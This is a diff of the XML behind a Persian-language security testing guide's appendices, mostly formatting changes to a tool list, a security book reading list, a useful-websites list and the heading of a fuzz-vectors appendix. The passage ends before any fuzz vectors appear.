+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>wget - http://www.gnu.org/software/wget, http://www.interlog.com/~tcharron/wgetwin.html</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -29922,7 +28848,6 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>curl - http://curl.haxx.se</w:t>
       </w:r>
     </w:p>
@@ -30006,6 +28931,18 @@
         <w:bidi/>
         <w:jc w:val="center"/>
         <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
           <w:b/>
           <w:bCs/>
@@ -30015,7 +28952,20 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">پیوست </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+          <w:sz w:val="36"/>
+          <w:szCs w:val="36"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>B</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
@@ -30027,31 +28977,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">پیوست </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>B</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-          <w:sz w:val="36"/>
-          <w:szCs w:val="36"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
         <w:t>: خواندنی های پیشنهادی</w:t>
       </w:r>
     </w:p>
@@ -30241,29 +29166,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Web Application Security is Not an Oxy-Moron, by Mark </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Curphey</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> - http://www.sbq.com/sbq/app_security/index.html</w:t>
+        <w:t>Web Application Security is Not an Oxy-Moron, by Mark Curphey - http://www.sbq.com/sbq/app_security/index.html</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30424,29 +29327,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">James S. Tiller: "The Ethical Hack: A Framework for Business Value Penetration Testing", </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Auerbach</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, ISBN: 084931609X</w:t>
+        <w:t>James S. Tiller: "The Ethical Hack: A Framework for Business Value Penetration Testing", Auerbach, ISBN: 084931609X</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30472,51 +29353,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Susan Young, Dave </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Aitel</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">: "The Hacker's Handbook: The Strategy behind Breaking into and Defending Networks", </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Auerbach</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>,</w:t>
+        <w:t>Susan Young, Dave Aitel: "The Hacker's Handbook: The Strategy behind Breaking into and Defending Networks", Auerbach,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30565,29 +29402,7 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">Secure Coding, by Mark Graff and Ken Van </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Wyk</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by O’Reilly, ISBN 0596002424(2003) - http://www.securecoding.org</w:t>
+        <w:t>Secure Coding, by Mark Graff and Ken Van Wyk, published by O’Reilly, ISBN 0596002424(2003) - http://www.securecoding.org</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30613,29 +29428,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Building Secure Software: How to Avoid Security Problems the Right Way, by Gary McGraw and John </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Viega</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by</w:t>
+        <w:t>Building Secure Software: How to Avoid Security Problems the Right Way, by Gary McGraw and John Viega, published by</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30731,51 +29524,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Innocent Code: A Security Wake-Up Call for Web Programmers, by </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Sverre</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Huseby</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by John Wiley &amp; Sons, ISBN</w:t>
+        <w:t>Innocent Code: A Security Wake-Up Call for Web Programmers, by Sverre Huseby, published by John Wiley &amp; Sons, ISBN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30823,29 +29572,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Exploiting Software: How to Break Code, by Gary McGraw and Greg </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Hoglund</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by Addison-Wesley Pub Co, ISBN</w:t>
+        <w:t>Exploiting Software: How to Break Code, by Gary McGraw and Greg Hoglund, published by Addison-Wesley Pub Co, ISBN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -30919,29 +29646,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Mastering the Requirements Process, by Suzanne Robertson and James </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Robertsonn</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by Addison-Wesley Professional,</w:t>
+        <w:t>Mastering the Requirements Process, by Suzanne Robertson and James Robertsonn, published by Addison-Wesley Professional,</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31037,29 +29742,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Web Applications (Hacking Exposed) by Joel </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Scambray</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and Mike Shema, published by McGraw-Hill Osborne Media, ISBN</w:t>
+        <w:t>Web Applications (Hacking Exposed) by Joel Scambray and Mike Shema, published by McGraw-Hill Osborne Media, ISBN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31107,29 +29790,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>Software Testing In The Real World (</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Acm</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Press Books) by Edward Kit, published by Addison-Wesley Professional, ISBN</w:t>
+        <w:t>Software Testing In The Real World (Acm Press Books) by Edward Kit, published by Addison-Wesley Professional, ISBN</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31177,29 +29838,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Securing Java, by Gary McGraw, Edward W. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Felten</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, published by Wiley, ISBN 047131952X (1999) -</w:t>
+        <w:t>Securing Java, by Gary McGraw, Edward W. Felten, published by Wiley, ISBN 047131952X (1999) -</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31239,27 +29878,15 @@
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>Beizer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>, Boris, Software Testing Techniques, 2nd Edition, © 1990 International Thomson Computer Press, ISBN 0442206720</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>Beizer, Boris, Software Testing Techniques, 2nd Edition, © 1990 International Thomson Computer Press, ISBN 0442206720</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -31297,7 +29924,6 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>وب سایت های مفید</w:t>
       </w:r>
     </w:p>
@@ -31376,6 +30002,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Secure Coding — http://www.securecoding.org</w:t>
       </w:r>
     </w:p>
@@ -31514,6 +30141,18 @@
       <w:pPr>
         <w:bidi/>
         <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
           <w:b/>
@@ -31524,7 +30163,20 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">پیوست </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
+          <w:sz w:val="32"/>
+          <w:szCs w:val="32"/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>C</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
@@ -31536,7 +30188,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">پیوست </w:t>
+        <w:t xml:space="preserve"> : بردار های</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31548,7 +30200,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>C</w:t>
+        <w:t xml:space="preserve">FUZZ </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31561,7 +30213,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> : بردار های</w:t>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31573,7 +30225,7 @@
           <w:szCs w:val="32"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">FUZZ </w:t>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31586,7 +30238,7 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>نامشخص</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31598,63 +30250,43 @@
           <w:szCs w:val="32"/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t>)</w:t>
-      </w:r>
-      <w:commentRangeStart w:id="1"/>
-      <w:commentRangeStart w:id="2"/>
+        <w:t>(</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:bidi/>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>نامشخص</w:t>
-      </w:r>
-      <w:commentRangeEnd w:id="1"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-          <w:rtl/>
-        </w:rPr>
-        <w:commentReference w:id="1"/>
-      </w:r>
-      <w:commentRangeEnd w:id="2"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:b/>
-          <w:bCs/>
-          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
-          <w:sz w:val="32"/>
-          <w:szCs w:val="32"/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="CommentReference"/>
-        </w:rPr>
-        <w:commentReference w:id="2"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:bidi/>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-      </w:pPr>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">موارد </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ز</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="cs"/>
@@ -31664,18 +30296,29 @@
           <w:rtl/>
           <w:lang w:bidi="fa-IR"/>
         </w:rPr>
-        <w:t xml:space="preserve">موارد </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ز</w:t>
+        <w:t>ی</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t>ر</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> بردارها</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -31690,25 +30333,31 @@
       </w:r>
       <w:r>
         <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin" w:hint="eastAsia"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t>ر</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
-          <w:color w:val="000000" w:themeColor="text1"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:rtl/>
-          <w:lang w:bidi="fa-IR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> بردارها</w:t>
+          <w:rFonts w:asciiTheme="majorBidi" w:hAnsiTheme="majorBidi" w:cs="B Nazanin"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:rtl/>
+          <w:lang w:bidi="fa-IR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>FUZZ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
